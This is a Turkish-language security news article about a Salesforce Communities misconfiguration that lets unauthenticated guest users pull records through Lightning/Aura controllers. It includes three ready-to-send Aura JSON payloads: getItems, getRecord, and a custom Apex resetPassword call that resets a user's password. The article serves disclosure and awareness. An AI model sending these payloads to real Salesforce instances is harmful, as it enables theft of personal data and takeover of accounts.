Salesforce uygulamalarında, hesabın tamamının ele geçirilmesine olanak verebilecek kritik bir güvenlik açığı keşfedildi.
Bir sızma testi çalışması sırasında ortaya çıkarılan güvenlik açığı, Salesforce Toplulukları içindeki yanlış yapılandırmalara, özellikle de Salesforce Lightning bileşen çerçevesinden yararlanılmasına dayanıyor.
Bu güvenlik açığının sonuçları ciddi olup hem veri güvenliğini hem de gizliliği etkilemektedir. Saldırganlar hassas kişisel bilgilere erişebilir, verileri değiştirebilir ve hatta idari hesapları ele geçirebilir.
Bu tür ihlaller, veri hırsızlığına, kimlik sahtekarlığına ve Salesforce kullanan kuruluşlarda ciddi mali ve itibar kaybına yol açabilir.
Güvenlik Açığı: Ayrıntılı Bir Bakış
Güvenlik açığı öncelikle Salesforce’un Topluluklar içindeki Konuk Kullanıcılar olarak bilinen kimliği doğrulanmamış kullanıcıları işlemesinden yararlanıyor.
Normalde Konuk Kullanıcılar hangi verilere erişebilecekleri ve hangi eylemleri gerçekleştirebilecekleri konusunda ciddi şekilde kısıtlanmıştır. Ancak bazı durumlarda yapılandırmalar ve özel bileşenler hassas bilgileri veya işlevleri açığa çıkarır.
KOBİ ve MSP Siber Güvenlik Liderleri için 2024 MITRE ATT&CK Sonuçlarından Yararlanma – Ücretsiz Web Seminerine Katılın
Sömürün Temel Noktaları:
- Saldırı Yüzeyinin Haritalanması: Saldırganlar, kullanılabilir uç noktaları ve bileşenleri belirlemek için Salesforce örneğinin haritasını çıkararak başlar. geçerli
aura.tokenVeaura.contextdeğerler, veri çıkarmaya başlayabilir ve çeşitli sınıflarla etkileşime girebilirler. - Standart Denetleyicileri Kullanma: Bu güvenlik açığından yararlanılırken iki birincil denetleyiciden yararlanılır:
getItems: Belirli bir nesnenin kayıtlarını alır ancak yanlış yapılandırılmışsa izinleri atlayabilir. Örnek yük:
{
"actions": [
{
"id": "123;a",
"descriptor": "serviceComponent://ui.force.components.controllers.lists.selectableListDataProvider.SelectableListDataProviderController/ACTION$getItems",
"callingDescriptor": "UNKNOWN",
"params": {
"entityNameOrId": "ContentVersion",
"layoutType": "FULL",
"pageSize": 100,
"currentPage": 0,
"useTimeout": false,
"getCount": false,
"enableRowActions": false
}
}
]
}getRecord: Bir kayıt kimliğini kullanarak belirli kayıtları alır.
{
"actions": [
{
"id": "123;a",
"descriptor": "serviceComponent://ui.force.components.controllers.detail.DetailController/ACTION$getRecord",
"callingDescriptor": "UNKNOWN",
"params": {
"recordId": "0099g000001mWQaYHU",
"record": null,
"mode": "VIEW"
}
}
]
}- Hassas Verilerin Çıkarılması: Saldırganlar, bu denetleyicileri kullanarak kişisel tanımlanabilir bilgileri (PII), iletişim ayrıntılarını, hesap bilgilerini ve hatta yanlış yapılandırılmış Salesforce nesnelerinden belgeleri çıkarabilir.
- Özel Apex Denetleyicilerinden Yararlanma: Özellikle tehlikeli bir durum, özel Apex denetleyicilerinin yanlış yapılandırılmasıdır.
CA_ChangePasswordSettingControllerbir yöntem ortaya koyuyorresetPasswordbu sadece bir gerektiriruserIDve birnewPasswordsaldırganların daha fazla doğrulamaya gerek kalmadan şifreleri sıfırlamasına olanak tanır.
{
"actions": [
{
"id": "123;a",
"descriptor": "apex://CA_ChangePasswordSettingController/ACTION$resetPassword",
"callingDescriptor": "UNKNOWN",
"params": {
"userID": "0056M",
"newPassword": "RT-wofnwo2!$4nfi!"
}
}
]
}
Böyle bir güvenlik açığının sonuçları ciddidir. Hassas verilere yetkisiz erişim, kimlik hırsızlığı, veri manipülasyonu ve hesabın tamamının ele geçirilmesi olası sonuçlardır.
En kötü senaryoda, bir saldırgan yüksek ayrıcalıklı hesaplara erişim kazanarak tüm Salesforce örneğinin ele geçirilmesine neden olabilir.
0xbro’nun keşfi, bulut tabanlı uygulamaların yönetiminde sağlam güvenlik uygulamalarının öneminin altını çiziyor.
Kuruluşlar kritik iş operasyonları için Salesforce gibi platformlara giderek daha fazla güvenirken, kapsamlı güvenlik önlemlerinin alınması büyük önem taşıyor.
Uygulamaların güvenliğine yönelik proaktif bir yaklaşımın benimsenmesi, risklerin azaltılmasına ve hassas verilerin kötü niyetli aktörlerden korunmasına yardımcı olabilir.
Analyse Advanced Malware & Phishing Analysis With ANY.RUN Black Friday Deals : Get up to 3 Free Licenses.